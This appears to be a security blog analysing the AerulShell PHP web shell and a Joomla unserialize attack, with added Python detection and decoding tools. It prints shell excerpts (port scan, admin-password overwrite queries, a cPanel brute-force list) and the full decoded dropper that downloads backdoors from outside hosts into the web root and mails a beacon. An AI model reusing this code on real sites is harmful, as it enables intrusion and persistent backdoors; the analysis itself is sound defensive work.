<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
...
<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>

You could launch a port scan on somebody

function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);

$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());

It can try to brute-force some default passwords

+--==[ Cpanel BruteForce ]==--+

abcd1234
abcdef
acb123

There are many more features if you dig deeper into the code. But hopefully the information above gives a good overview of the power and danger of web shells like AerulShell, and a bit more insight into the inner workings and the thought process of the people who write them.
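Here is an added Python example (not part of the post and not AerulShell's code) of a small static triage scanner for the constructs called out above: the md5-gated login on a request parameter, eval(base64_decode(...)), the mail beacon, fsockopen, fetching a remote URL with file_get_contents, chmod 0777 and command execution. The indicator patterns, the placeholder hash, host and URL in the constructed sample, and the 'clean' sample are all my assumptions; a hit is a reason to read the file, not a verdict.

```python
import re

# Added example: flag the PHP constructs the walk-through above points at.
# Not AerulShell's code and not from the post; patterns are assumptions.
INDICATORS = [
    (re.compile(r"eval\s*\(\s*base64_decode\s*\("),                   "eval of base64-decoded data"),
    (re.compile(r"md5\s*\(\s*\$_(?:POST|GET|REQUEST)\["),              "hash-gated login on a request parameter"),
    (re.compile(r"(?<![A-Za-z_])mail\s*\("),                          "outbound mail call (beacon to an operator)"),
    (re.compile(r"fsockopen\s*\("),                                   "raw socket open (backconnect or port scan)"),
    (re.compile(r"file_get_contents\s*\(\s*['\"]https?://"),          "remote fetch (tool or stage download)"),
    (re.compile(r"chmod\s*\([^)]*0777"),                              "world-writable permission change"),
    (re.compile(r"(?<![A-Za-z_])(?:exec|shell_exec|system|passthru|popen)\s*\("),
                                                                      "command execution primitive"),
]


def scan_php(source):
    """Return (line_number, label) pairs, in file order, for every indicator hit."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rx, label in INDICATORS:
            if rx.search(line):
                hits.append((lineno, label))
    return hits


# Constructed sample mimicking the shape of the shell's code; the hash, the
# mailbox host and the download URL are placeholders, not the real values.
SAMPLE_SHELL = """<?php
$auth_pass = "00000000000000000000000000000000";
if( md5($_POST['x']) == $auth_pass ) { $_SESSION['ok'] = true; }
$shell_data = "JHZpc2l0...";
eval(base64_decode($shell_data));
@mail("boss@mailbox.example.invalid", "subject", $body);
$connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
$file = file_get_contents('http://paste.example.invalid/raw/placeholder');
chmod("auto/auto.pl", 0777);
echo shell_exec($_POST['cmd']);
?>"""

# Constructed ordinary application code that should produce no hits.
SAMPLE_CLEAN = """<?php
$config = json_decode(file_get_contents('data/config.json'), true);
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
echo htmlspecialchars($config['title']);
?>"""

if __name__ == "__main__":
    for name, src in (("shell", SAMPLE_SHELL), ("clean", SAMPLE_CLEAN)):
        print(f"== {name}: {len(scan_php(src))} hit(s)")
        for lineno, label in scan_php(src):
            print(f"  line {lineno}: {label}")
```

Run over a web root, the interesting files are the ones that collect several distinct labels; a single file_get_contents of a remote URL is common in legitimate code, while the combination of a hash-gated login, a decoded eval stage and a command primitive in one file is not.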


### Joomla DeSerialize Deobfuscation 101

Saw this web request; it is the Joomla unserialize vulnerability. Below I walk through how to see what it's doing.

GET /

Joomla wasn't validating input, and when de-serializing the blob above it would actually evaluate and execute some of it. What, you may ask? Well, take the base64-encoded part, do a quick decode, and you get:

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('...'));
fclose($fp);

Above you see they are opening a new file in your web root folder called xxxx.php and writing something to it. What, you may ask? Let's do a base64 decode again on whatever it is. Ah, interesting: we get some PHP code:

<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."
";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."
";
}else
echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen ' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

?>

Now the attacker can access the file on your site at www.mysite.com/media/xxxx.php. As soon as he does, the PHP code above creates another file called css.php based on the contents of the malicious url hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt. Actually it does this over and over, creating a bunch of backdoors or web shells, so that even if the good guy finds and removes 1 or 2 of these files the attacker still has a way back onto your compromised machine. Finally, at the end, an email is sent to indicate the code ran successfully.
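To automate the two decode steps walked through above, here is an added Python example (not the blog's code). The two PHP stages are constructed stand-ins that mirror the structure of the post's payload, an outer stage that base64_decodes an inner stage into a file under DOCUMENT_ROOT, with placeholder host and file names. peel() decodes a blob and follows every nested base64_decode('...') literal it finds; extract_iocs() lists the URLs fetched and the web-root files written, which is what you would block at the proxy and search for on the server.

```python
import base64
import re

# Added example: peel nested base64 layers of a dropper and list its IoCs.
# Not the blog's code. The two stages below are constructed stand-ins; the
# host dropper.example.invalid and the file names are placeholders.
INNER_STAGE = """<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://dropper.example.invalid/components/joomla.txt');
$open = fopen($check, 'w'); fwrite($open, $text); fclose($open);
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://dropper.example.invalid/components/jmailz.txt');
$open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2);
?>"""

OUTER_STAGE = (
    "$check = $_SERVER['DOCUMENT_ROOT'] . \"/media/xxxx.php\" ;\n"
    "$fp=fopen(\"$check\",\"w+\");\n"
    "fwrite($fp,base64_decode('" + base64.b64encode(INNER_STAGE.encode()).decode() + "'));\n"
    "fclose($fp);\n"
)

# What a defender actually starts from: the blob lifted out of the request.
CAPTURED_BLOB = base64.b64encode(OUTER_STAGE.encode()).decode()

B64_LITERAL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
URL_RX = re.compile(r"https?://[^\s'\"]+")
WEBROOT_PATH_RX = re.compile(r"\$_SERVER\['DOCUMENT_ROOT'\]\s*\.\s*\"([^\"]+)\"")


def peel(blob, max_depth=5):
    """Decode a base64 blob, then keep decoding every base64_decode('...')
    literal found in the result. Returns the decoded layers, outermost first."""
    layers, queue, depth = [], [blob], 0
    while queue and depth < max_depth:
        next_queue = []
        for candidate in queue:
            try:
                text = base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
            except ValueError:            # binascii.Error is a ValueError: not base64, skip
                continue
            layers.append(text)
            next_queue.extend(B64_LITERAL.findall(text))
        queue, depth = next_queue, depth + 1
    return layers


def extract_iocs(layers):
    """Collect the remote URLs and web-root files referenced by any layer."""
    urls, paths = set(), set()
    for text in layers:
        urls.update(URL_RX.findall(text))
        paths.update(WEBROOT_PATH_RX.findall(text))
    return {"urls": sorted(urls), "webroot_files": sorted(paths)}


def analyse(blob=CAPTURED_BLOB):
    """One-call triage: number of layers plus the IoCs found across them."""
    layers = peel(blob)
    return {"layers": len(layers), **extract_iocs(layers)}


if __name__ == "__main__":
    report = analyse()
    print(f"decoded {report['layers']} layer(s)")
    print("fetches:", *report["urls"], sep="\n  ")
    print("writes under web root:", *report["webroot_files"], sep="\n  ")
```

Feeding the real captured blob in place of CAPTURED_BLOB gives you, in one pass, the list of dropped files to remove (every one of them, not just the first one you stumble on) and the download hosts to block and hunt for in proxy logs. The depth limit guards against a blob that decodes to itself forever.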